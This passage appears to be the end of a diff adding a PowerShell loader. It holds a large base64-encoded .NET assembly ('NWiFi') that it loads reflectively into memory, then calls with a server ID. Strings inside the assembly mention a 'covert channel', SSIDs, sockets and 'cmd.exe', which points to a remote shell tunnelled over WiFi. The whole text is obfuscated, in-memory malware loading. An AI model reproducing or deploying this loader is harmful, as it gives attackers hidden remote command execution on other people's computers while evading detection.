QBuAGkAdAAgAFIAZQBzAHAAbwBuAHMAZQAgADEAIAByAGUAYwBlAGkAdgBlAGQAIAAoAEMAbABpAGUAbgB0ACAASQBEACAAewAwAH0AIABhAHMAcwBpAGcAbgBlAGQAKQAAIU4AbwB0AGgAaQBuAGcAIAByAGUAYwBlAGkAdgBlAGQAADVDAG8AbgBuAGUAYwB0ACAASQBuAGkAdAAgAFIAZQBxAHUAZQBzAHQAIAAyACAALgAuAC4AAEkuAC4ALgAgAGMAbwBuAG4AZQBjAHQAIABJAG4AaQB0ACAAUgBlAHMAcABvAG4AcwBlACAAMgAgAHIAZQBjAGUAaQB2AGUAZAAAI04AbwB0AGgAaQBuAGcAIAByAGUAYwBlAGkAdgBlAGQACgAAUUMAbwBuAG4AZQBjAHQAaQBvAG4AIABvAHAAZQBuACwAIABzAHQAYQByAHQAaQBuAGcAIABkAGEAdABhACAAdABhAHIAbgBzAGYAZQByACEAAEFTAHQAYQByAHQAaQBuAGcAIABzAGUAbgBkACAAYQBuAGQAIAByAGUAYwBlAGkAdgBlACAAdABoAHIAZQBhAGQAAEs9AD0APQA9AD0APQA9AD0APQA9AD0AIABTAEMAQQBOACAAPQA9AD0APQA9AD0APQA9AD0APQA9AD0APQA9AD0APQA9AD0APQA9AABTPQA9AD0APQA9AD0APQA9AD0APQA9ACAAUwBDAEEATgAgAEUATgBEACAAPQA9AD0APQA9AD0APQA9AD0APQA9AD0APQA9AD0APQA9AD0APQA9AACAm0QAaQBzAGMAYQByAGQAaQBuAGcAIAByAGUAcwB0ACAAbwBmACAAaQBuAGIAbwB1AG4AZAAgAGQAYQB0AGEALAAgAGEAcwAgAHUAcABkAGEAdABlAGQAIABUAFgAIABwAGEAYwBrAGUAdAAgAGgAYQBzACAAdABvACAAYgBlACAAcwBlAG4AdAAgAGYAaQByAHMAdAAuAC4ALgAAQUkAZwBuAG8AcgBpAG4AZwAgAHAAYQBjAGsAZQB0ACAAZgBvAHIAIABvAHQAaABlAHIAIABDAGwAaQBlAG4AdAAANyoAKgAqACoAKgAqACAATgBlAHcAIABPAFUAVABEAEEAVABBACAAKgAqACoAKgAqACoAKgAqAAApKgAqACoAKgAqAE4AZQB3ACAASQBOAEQAQQBUAEEAKgAqACoAKgAqAAA/UAByAG8AYgBlACAAUgBlAHEAdQBlAHMAdAAgAHMAZQBuAHQACgAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQABS1IAZQBjAGUAaQB2AGUAZAAgAFAAcgBvAGIAZQAgAFIAZQBzAHAAbwBuAHMAZQAKAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0AAXtJAG4AcQB1AGUAdQBlACAAbABpAG0AaQB0ACAAewAwAH0AIAByAGUAYQBjAGgAZQBkACwAIABkAGEAdABhACAAbgBlAGUAZABzACAAdABvACAAYgBlACAAcABvAHAAcABlAGQAIAB0AG8AIAByAGUAYwBlAGkAdgBlAABhUABhAGMAawBlAHQAIABpAGcAbgBvAHIAZQBkACwAIABiAGUAYwBhAHUAcwBlACAAcwBvAGMAawBlAHQAIABuAG8AdAAgAGkAbgAgAE8AUABFAE4AIABzAHQAYQB0AGUAAICjUwBUAEEAUgBUACAARgBvAHIAYwBlAGQAIABzAGwAZQBlAHAALAAgAGIAZQBjAGEAdQBzAGUAIABsAGEAcwB0ACAAcgBlAHMAcABvAG4AcwBlACAAaABhAGQAIABkAGEAdABhACAAaQBuAGMAbAB1AGQAZQBkAC4ALgAuACAAbwB1AHQAcQB1AGUAdQBlACAAYwBvAHUAbgB0ACAAewAwAH0AAIChUwBUAE8AUAAgAEYAbwByAGMAZQBkACAAcwBsAGUAZQBwACwAIABiAGUAYwBhAHUAcwBlACAAbABhAHMAdAAgAHIAZQBzAHAAbwBuAHMAZQAgAGgAYQBkACAAZABhAHQAYQAgAGkAbgBjAGwAdQBkAGUAZAAuAC4ALgAgAG8AdQB0AHEAdQBlAHUAZQAgAGMAbwB1AG4AdAAgAHsAMAB9AACArVMAdABvAHAAcABpAG4AZwAgAHMAZQBuAGQALwByAGUAYwBlAGkAdgBlACAAdABoAHIAZQBhAGQAIABmAG8AcgAgAEMAbABpAGUAbgB0AFMAbwBjAGsAZQB0ACwAIABiAGUAYwBhAHUAcwBlACAAcwBvAGMAawBlAHQAIABpAHMAbgAnAHQAIABuAG8AdAAgAGkAbgAgAE8AUABFAE4AIABzAHQAYQB0AGUALgABJVMAUwBJAEQAIAByAGUAYwBpAGUAdgBlAGQAOgAgAHsAMAB9AAAnRABpAHMAYwBhAHIAZABlAGQAIABTAFMASQBEADoAIAB7ADAAfQAAW0EAYwBjAGUAcwBzACAAdgBpAG8AbABhAHQAaQBvAG4AIABpAG4AIABlAHgAdAByAGEAYwB0AEkAZQAgAGYAbwByACAASQBFACAAdAB5AHAAZQAgAHsAMAB9AAAZUwBjAGEAbgAgAGYAYQBpAGwAZQBkACEAAB9TAGMAYQBuACAAYwBvAG0AcABsAGUAdABlAGQAIQAAJU4AZQB0AHcAbwByAGsAIABBAHYAYQBpAGwAYQBiAGwAZQAhAAAtTgBlAHQAdwBvAHIAawAgAE4ATwBUACAAQQB2AGEAaQBsAGEAYgBsAGUAIQAAJ1AAcgBvAGYAaQBsAGUAcwAgAGUAeABoAGEAdQBzAHQAZQBkACEAAFlOAG8AIAB2AGEAbABpAGQAIABoAGEAbgBkAGwAZQAgAGYAbwByACAAbgBhAHQAaQB2AGUAIABXAGkARgBpACAAQQBQAEkAIAByAGUAYwBlAGkAdgBlAGQAAEdFAHIAcgBvAHIAIAByAGUAZwBpAHMAdABlAHIAaQBuAGcAIABmAG8AcgAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAAFVUAHIAeQBpAG4AZwAgAHQAbwAgAGMAbwBuAG4AZQBjAHQAIABjAG8AdgBlAHIAdAAgAGMAaABhAG4AbgBlAGwAIAB2AGkAYQAgACcAewAwAH0AJwABW0MAbwBuAG4AZQBjAHQAaQBvAG4AIABlAHMAdABhAGIAbABpAHMAaABlAGQACgBNAFQAVQA6ACAAewAwAH0ACgBDAGwAaQBlAG4AdABJAEQAOgAgAHsAMQB9AAAPYwBtAGQALgBlAHgAZQAAS1MAdQBiAHAAcgBvAGMAZQBzAHMAIABkAGkAZQBkACAAdwBpAHQAaAAgAHIAZQBhAHMAbwBuACAAYwBvAGQAZQA6ACAAewAwAH0AAFFOAG8AIABzAHUAYwBjAGUAcwBzACAAYQBmAHQAZQByACAAewAwAH0AIABjAG8AbgBuAGUAYwB0AGkAbwBuACAAYQB0AHQAZQBtAHAAdABzAABDQwBsAG8AcwBpAG4AZwAgAGgAYQBuAGQAbABlACAAdABvACAAbgBhAHQAaQB2AGUAIABXAGkARgBpACAAQQBQAEkAABtTAHQAYQByAHQAaQBuAGcAIAB0AGUAcwB0AABBUAByAG8AYwBlAHMAcwAgAGQAaQBlAGQAIAB3AGkAdABoACAAZQB4AGkAdAAgAGMAbwBkAGUAOgAgAHsAMAB9AAATcgBhAHQAZQBJAG4AZABlAHgAAAMKAAAxUAByAG8AYwAgAGQAYQB0AGEAIAB0AG8AIABzAG8AYwBrAGUAdAA6ACAAewAwAH0AADlTAG8AYwBrAGUAdABkAGEAdABhACAAZABhAHQAYQAgAHQAbwAgAHAAcgBvAGMAOgAgAHsAMAB9AABxUwBvAGMAawBlAHQAIABiAGEAYwBrAGkAbgBnACAAdABoAGUAIABwAHIAbwBjAGUAcwBzACAAZABpAHMAYwBvAG4AbgBlAGMAdABlAGQAIAB3AGkAdABoACAAcgBlAGEAcwBvAG4AOgAgAHsAMAB9AABhUwBvAGMAawBlAHQAIABjAGwAbwBzAGUAZAAgAC4ALgAuACAAZQBuAGQAaQBuAGcAIABsAGkAcwB0AGUAbgBpAG4AZwAgAHAAcgBvAGMAZQBzAHMAIAAnAHsAMAB9ACcAAQD3JVEwF0+eRZ1scnqzYlTXAAQgAQEIAyAAAQUgAQEREQQgAQEOBCABAQIGFRI9ARMABSABARFFBhUSCAETAAIGCAMGEk0DBwECAyAAAgMgAAgFIAEBEwAGBwQCAgICBCABAggGBwITABMABCAAEwADBwEOBgACDg4dHAUHAw4CDgUAAQ4dBQUgAg4ODgoHBB0dBQIdHQUCAh0FCgADARKAoRKAoQgMAAUBEoChCBKAoQgICgcGHQUCHQUCAgIMBwgSEAUFBQIFAhIQEAcLHQUFBQUCAgIdBQICHQUEAAEBDgUAAggICAsHBh0FBQIdBQIdBQkHBwUCAgICAgIFBwMOAgIFAAIODg4FAAIODhwKBwYHCB0FAgIdBQcHBQUIAgIFBhUSCAEdBUAHNAgSYRIQHQUCEhACHRIQAggSEAIFAgICCAICAgICAgICAgICAgIdEhACCBIQAgICAggCAgICCAICAgICAgICBSABAR0FBSACARwYBiABARKAuTEHJh0FEhAdBR0dBQICGAICAh0SEAIIEhAFAgICAgICAgIIAgICAggdBQICAgICAgICBhUSPQEdBQQAAQEIBAcCAgIQBw0ICB0FAggCAgICAgICAg0HCQgdBQIIAggIHQUCEwcHAh0dBRUSZQEFHQUdHQUIHQUFIAAdEwAFFRJlAQUKIAEBFRKAvQETAAUHAgIdBQYHBBgJAhgCBhgpBxcCFRJlARIQEUQYGBE0Ch0RQAIRLBgCAh0SEAgdBR0FHQUJGBIQAgIGFRJlARIQBAABCBwEAAEYCAYAAwEcGAIEAAEBGAgAARKAyRGAzQcAAhwYEoDJAyAACgYAAQgSgMkEIAEBCgwHCB0FCAUFAh0FAgIFAAIFGAgIAAQBGB0FCAgOBwcYETAdETgKCAIdETgEBwERTBwHERgdETgIAggRSB0ROAgROBFZEhgCAhJYCAICBQACAhgYBgADDg4cHAYHBAIIAgIGBwIdBx0HBAcCAg0EBwIIAgUHAg4dBQMgAA4FAAASgNkFIAEdBQ4KBwgICA4CAgICCAYgAQESgIEGIAEBEoDdByADDh0FCAgFIAASgOEIt3pcVhk04IkBAQECAQMBBAEFAQYBBwEIAQkBAAEbAewEAQAAAAQCAAAABAMAAAAEBAAAAAQFAAAABAYAAAAEBwEAAAQbAAAABAAAAAAEBwAAAAQAAACABP////8E//8AAAQIAAAABBAAAAAEIAAAAARAAAAABAkAAAAECgAAAAQLAAAABAwAAAAEDQAAAAQOAAAABA8AAAAEEQAAAAQSAAAABBMAAAAEFAAAAAQVAAAABBYAAAADHoDwAxeBAAIefgIeBgIeIAMGHQUCBgUCBgIDBhEUAwYRWQMGEhADBhJdBwYVEggBHQUCBgkDBhEgAwYRJAMGESgCBg4DBh0HAwYRRAIGBwIGCwMGETwDBhFIAwYRTAMGEhgEBhKAgQQGEoCFCAACHR0FHQUICAADHQUdBQgIDAAEEhAdBR0FHQUdBQUgAR0FAgcAAgIdBR0FBwACHQUdBQgGAAIFHQUICCAEAhgRWQUIBiACCB0FAgcgAwgdBQgCBiACAR0FAgQgAB0FBwADCRgYEBgJAAQICRgQCRAYBQACCRgYCgAFCRgQEVkYGBgOAAcIGBARWRgRJAIYEBgOAAcIGBFIAhJUGBgQEUgEAAEYCQsABB0SEBgRWRIQAgcAAx0FBRgJBgABHRE4GAcAAgEQEVAYBQACCAgFBQACAQgFAwAAAQQgAB0HBCABDQgHIAIBEBFQGAsgBBJ5EBFQGBJ9HAggAgEQEVASeQYgAgESGA4HIAIBHBKAiQMoAAgEKAAdBwgBAAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEIAQAHAQAAAAAKAQAFTldpRmkAAAUBAAAAABcBABJDb3B5cmlnaHQgwqkgIDIwMTgAACkBACRiZjI0MTk0Yi02ZjM2LTQyNzgtYmFhOS04ZDdhNTMwMDdmMTgAAAwBAAcxLjAuMC4wAAAIAQAAAAAAAAAAAAAAAABYBb1aAAAAAAIAAAAcAQAADH0AAAxfAABSU0RTfY/g0vB5DEal9IlZYfaHuAEAAABDOlxVc2Vyc1xYTUctVTcwNVxkb2N1bWVudHNcdmlzdWFsIHN0dWRpbyAyMDE1XFByb2plY3RzXFdpRmlUZXN0XE5XaUZpXG9ialxEZWJ1Z1xOV2lGaS5wZGIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFB+AAAAAAAAAAAAAGp+AAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAABcfgAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAD/JQAgABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAAADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYgAAA/AIAAAAAAAAAAAAA/AI0AAAAVgBTAF8AVgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8AAAAAAAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQABAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBFwCAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYAbwAAADgCAAABADAAMAAwADAAMAA0AGIAMAAAABoAAQABAEMAbwBtAG0AZQBuAHQAcwAAAAAAAAAiAAEAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAAAAAAA0AAYAAQBGAGkAbABlAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAAAAAATgBXAGkARgBpAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAxAC4AMAAuADAALgAwAAAANAAKAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABOAFcAaQBGAGkALgBkAGwAbAAAAEgAEgABAEwAZQBnAGEAbABDAG8AcAB5AHIAaQBnAGgAdAAAAEMAbwBwAHkAcgBpAGcAaAB0ACAAqQAgACAAMgAwADEAOAAAACoAAQABAEwAZQBnAGEAbABUAHIAYQBkAGUAbQBhAHIAawBzAAAAAAAAAAAAPAAKAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0AZQAAAE4AVwBpAEYAaQAuAGQAbABsAAAALAAGAAEAUAByAG8AZAB1AGMAdABOAGEAbQBlAAAAAABOAFcAaQBGAGkAAAA0AAgAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAOAAIAAEAQQBzAHMAZQBtAGIAbAB5ACAAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHAAAAwAAAB8PgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="
+[System.Reflection.Assembly]::Load([Convert]::FromBase64String($s))
+[NWiFi.NativeWifi]::run(-1, $srvID)
\ No newline at end of file